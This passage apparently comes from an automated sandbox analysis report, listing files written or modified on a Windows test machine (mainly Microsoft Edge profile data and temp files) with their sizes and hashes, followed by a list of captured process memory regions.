SHA1
dcaf6a6bd1866ea04440bd2934a3642781bddb24

SHA256
d48339d8cce610cf58943825c4e96be088d82c57e652fe764aedeb30c3fb86e8

SHA512
03d42b7abe4f43408a5f9060e780ee0d53c450b7937f1d3193dd4ec40dea6b6b53c1984b9c5424d43682d56f1ddf983f160af7bcf6a8fabbdced17fbfd846157

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

Filesize
5KB

MD5
99c3e6e5cf70b4fe9a7cccadefb666a8

SHA1
f3f873c178fba7275678b6c47658e74c7231899b

SHA256
8478d6c54ed51b387164ffac6299303c4d6d40c7ba50fb794eb9fa19e6f16703

SHA512
9cc5c9197f3e6723b98992f09a02f2970cd00bf4c879d7df41a27972dc4c00dbfd1593c544832a63a683d9d70ed38ece87b3778ff6a8ffea58fa391efc7b903a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Preferences

Filesize
5KB

MD5
362817119d286f39402b5a86523f60f4

SHA1
4c2fb2a7cba884e0a3757da060ae0dedeb951ae3

SHA256
5c94e21f10d36f5a287527d2d597ec2897c21a76a0c0e79c96ddacb9df10388d

SHA512
8902849eeac5c2f1ba4010ba7debe6d205399c7b9b0df10e5d75d5cffe7ed193c0dee26b8519f1e048b94e4f720a41daa7d16f35e5db6bedba5e240d328d8ef5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Secure Preferences

Filesize
24KB

MD5
cbadef928f2fc6011e6653fb0abb8080

SHA1
e9049f10da10ea47f4b9b17c4f2be0893a78906f

SHA256
9b21a0e1128165f1f0553dad8f7db4d9e0550686a3518df59db388b32a97ad7c

SHA512
99e56d3b3095c92ee1f1807cfcce7603b691da26a6d3ae8437d65818cf37e47bc9389f33f3ed1b31cae5e0b3d7d55bb83cf9a239daace24408354e0629d41e9a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Session Storage\LOG

Filesize
281B

MD5
bd68931760fb0ea8496804cd8d26a7c5

SHA1
c60997f960698d8dea6777ff5004b704b4eea6e0

SHA256
be6d3d360534905c29614757e68f322ef3369ad30e55fb9c3d3402334d5a47d7

SHA512
43aff92c51d13c45928d7e0b3c9ccd9c66c81b74f5c9902a1ca63bab57006347a5d77100f00014db3533266b5883c7453c1ffe44d4b792a309bab029ed1ca592

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Session Storage\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sessions\Tabs_13384282889468550

Filesize
933B

MD5
007f965a550da7da5c57aa91f90532bf

SHA1
92f1de7af1a04c41209d83b7d60bb84407fdee68

SHA256
c5270b8c77a7ccabe8adf9e977e83f2dd0aca76cbdf6e8f36c2ddae6acae905b

SHA512
71e5229f627a37c9af24ef2f43cdf0da6cbef77685b1eb129d8db40e4fe551c950a88abe2a17e2eacc7aff54605a92269321c13e411aadd653075fbbf32ca2f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\000003.log

Filesize
40B

MD5
148079685e25097536785f4536af014b

SHA1
c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

SHA256
f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

SHA512
c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
bb2f275165a05a012b48aa746cf8aef9

SHA1
1bd85787c58206a43cf19581c43d1f1cdab66cdb

SHA256
7c8a462490f78583dfa386854ec3eec51b53c7b3e8845182187975b45cf40230

SHA512
434b5f44aac427165a6967f6007ea211c2a54d046b8fc3d9e16e4a0154d68d942c6fde6cc6e3a64047b466ae217d7f3b9b51dc0be41a26c63d63bbf2615ee4ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Site Characteristics Database\LOG.old

Filesize
309B

MD5
a8674572dd0c7d4d8ea450ec0f7fc50b

SHA1
8480d7fe1dfcc17db614b33f326efc0093b7b751

SHA256
33b71170b8abc42b7b945112bc44c010ef44b36c9781d1a4afd0a7b46e777de3

SHA512
3ca2c06a714fcb91d635ff12fb8393e01f0612b569dc7027e09cd480fd280b0cbed5a6737de2fa8f872fa8216872c9bcbb1248f62de85c7a53a3f16a9283e2bb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\000003.log

Filesize
46B

MD5
90881c9c26f29fca29815a08ba858544

SHA1
06fee974987b91d82c2839a4bb12991fa99e1bdd

SHA256
a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

SHA512
15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
6a8e076bddaf37f39e776f80bed09634

SHA1
4bdda405370525fe1abfd203b2c4909c4ca280fd

SHA256
4510e2a4132bf28c1ad6daced59024df7b7623e84c681623939f1600c7e0ace4

SHA512
6fea0ffd5d9ea45feb0f466a10fb583691b8be0a37163b79b38afea3637e26d87131625764235cfb38b4f7fed7ec9a239b510a27d87770cf358ebb52cbf5a8f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Sync Data\LevelDB\LOG.old

Filesize
285B

MD5
2ae62c0c9c0449f730bf22a3d57e0e18

SHA1
ceb2c79fbba55532aa4a894347402010af788686

SHA256
b48bbc78dab82cfa2471eef42d61a2db4ba84f413a8a90b20be92cb3ebf80541

SHA512
5c3e7b02f18e447df05009c67cf00dd4894afca44857add99c512530d6e72371fd2944b9ea3e9fb09339a115f1019cad4f2977a73b1adbcb35e6717e8d05abfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Top Sites

Filesize
20KB

MD5
f44dc73f9788d3313e3e25140002587c

SHA1
5aec4edc356bc673cba64ff31148b934a41d44c4

SHA256
2002c1e5693dd638d840bb9fb04d765482d06ba3106623ce90f6e8e42067a983

SHA512
e556e3c32c0bc142b08e5c479bf31b6101c9200896dd7fcd74fdd39b2daeac8f6dc9ba4f09f3c6715998015af7317211082d9c811e5f9e32493c9ecd888875d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Visited Links

Filesize
128KB

MD5
289c70195d1cbe098b3562cdfe69404b

SHA1
084159fd1febeb8f7a601896e5793ba6434d6944

SHA256
9512869cebff92fbaad30bbd303a9beb4b38d83729baa30ec614e2f927279e92

SHA512
6cdd83679a5cf5d2a7cb9e15993bcbbac520f78eea33a28db483fd11cdd1b040ca8aa5028e009c5e78726006d50bddd2f93fc9b5182997a55a1cfa9150f1e5d4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\Web Data

Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Default\load_statistics.db

Filesize
44KB

MD5
7e44dea7cee3ddf148790735d1db7f0f

SHA1
d3733e51b868489fe8ac26c376d7cd75dab1a7cb

SHA256
9e2009877b8bb709b5d898ba8072fba265ecba0f4c9fc55935f1e1daf1ef5e49

SHA512
3c792f91627711e58822de7e3ce24fdd4586d4841ac2faa6b9344192c7d7bab3ec4e949198c273ba393d7184fa8c72ee5b87f61d810ca86605eed953540781f1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Local State

Filesize
11KB

MD5
4e6bdb30149488482f3d2703bc6417ec

SHA1
039472bf09a64889b58d4197980d29148b5dad86

SHA256
dc9c9008d81c2f2b46a79b73e339ac4173b45523e6f984801d066eca53df7ad0

SHA512
19bdd514a21acca51edfbea72540e6717c0d4b2adf5f94c20eecd26721f517764f724ab92abc9b880bd2ffdc677eecaf75a60844050ea7728971ad2bc83c94e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\Local State

Filesize
8KB

MD5
5f1f0606dce3937031f144c141eed2f9

SHA1
f0140073290ed7abb134f855e0c9887ac532e28d

SHA256
2c7bb52c9c0441e4d4584db910e3c89091f6b57bfbe3dac32383829d6e077c21

SHA512
6eaf477ab4f7de392d824f0af7e5036a7e7d1e807443a1bdeb0c8ebbed78ae234129ebe2486b6bb5b6ca621d7f7a24b133cac2e3ed701bc3d7667601fdab389d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\SmartScreen\local\download_cache

Filesize
184B

MD5
24127606dac5cc6142848b0387a3afb6

SHA1
2dd825cba2ded5f73de2f70d3056764788d6b3cd

SHA256
7680b8117dce679eaf37a1c4670506fda78781cfcd994295b5108db18fbbc3a8

SHA512
0c37b62b580255716371554cd47a1d7aa15a92b5376ff66d42cacf1e2fd95c027e7f8781231c4b0d9ccc17521a94f1e719cfd2307853d6d7d72dd8155ba6868b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\Edge Data\SmartScreen\local\warnStateCache

Filesize
72B

MD5
3f66f244278461dd07a3feb77a17712f

SHA1
8d570b550699ad0f248ec98b5d678f54248c0a84

SHA256
203ce5c7c1680c6e98f5ceca920e9d904122a9e26a743191e9b0fe1f6584ed60

SHA512
8d4733222e2e0bbc18370055d0602d0389e7a562887e97b2e54073017ffea024e9b1341ed95e28883861ef5e0d4fa9d27ed0894912ffe167632aed2e4cf53e7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gid4zg5z.4mi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir1456_590906811\4a607c45-7d08-438b-989a-e049d11e0844.tmp

Filesize
150KB

MD5
eae462c55eba847a1a8b58e58976b253

SHA1
4d7c9d59d6ae64eb852bd60b48c161125c820673

SHA256
ebcda644bcfbd0c9300227bafde696e8923ddb004b4ee619d7873e8a12eae2ad

SHA512
494481a98ab6c83b16b4e8d287d85ba66499501545da45458acc395da89955971cf2a14e83c2da041c79c580714b92b9409aa14017a16d0b80a7ff3d91bad2a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir1456_590906811\CRX_INSTALL\_locales\en_CA\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
memory/3952-1596-0x000000001B1F0000-0x000000001B1FA000-memory.dmp

Filesize
40KB

Download
memory/3952-7-0x00007FFEC0860000-0x00007FFEC1321000-memory.dmp

Filesize
10.8MB

Download
memory/3952-1-0x0000000000470000-0x0000000000480000-memory.dmp

Filesize
64KB

Download
memory/3952-8-0x0000000002540000-0x000000000254C000-memory.dmp

Filesize
48KB

Download
memory/3952-6-0x00007FFEC0860000-0x00007FFEC1321000-memory.dmp

Filesize
10.8MB

Download
memory/3952-0-0x00007FFEC0863000-0x00007FFEC0865000-memory.dmp

Filesize
8KB

Download
memory/3952-475-0x0000000002410000-0x0000000002426000-memory.dmp

Filesize
88KB

Download
memory/5704-1096-0x00000000030E0000-0x000000000328E000-memory.dmp

Filesize
1.7MB

Download
memory/6072-477-0x0000000074FBE000-0x0000000074FBF000-memory.dmp

Filesize
4KB

Download
memory/6072-479-0x0000000004FB0000-0x000000000504C000-memory.dmp

Filesize
624KB

Download
memory/6072-478-0x0000000004F10000-0x0000000004FA2000-memory.dmp

Filesize
584KB

Download
memory/6072-480-0x0000000005600000-0x0000000005BA4000-memory.dmp

Filesize
5.6MB

Download
memory/6072-476-0x0000000000400000-0x0000000000410000-memory.dmp

Filesize
64KB

Download
memory/6072-481-0x0000000005100000-0x0000000005166000-memory.dmp

Filesize
408KB

Download
memory/6072-1052-0x0000000074FBE000-0x0000000074FBF000-memory.dmp

Filesize
4KB

Download
memory/6116-483-0x0000000005B50000-0x0000000006178000-memory.dmp

Filesize
6.2MB

Download
memory/6116-484-0x0000000005720000-0x0000000005742000-memory.dmp

Filesize
136KB

Download
memory/6116-485-0x00000000059C0000-0x0000000005A26000-memory.dmp

Filesize
408KB

Download
memory/6116-491-0x0000000006280000-0x00000000065D4000-memory.dmp

Filesize
3.3MB

Download
memory/6116-496-0x0000000006800000-0x000000000681E000-memory.dmp

Filesize
120KB

Download
memory/6116-497-0x0000000006820000-0x000000000686C000-memory.dmp

Filesize
304KB

Download
memory/6116-482-0x0000000003220000-0x0000000003256000-memory.dmp

Filesize
216KB

Download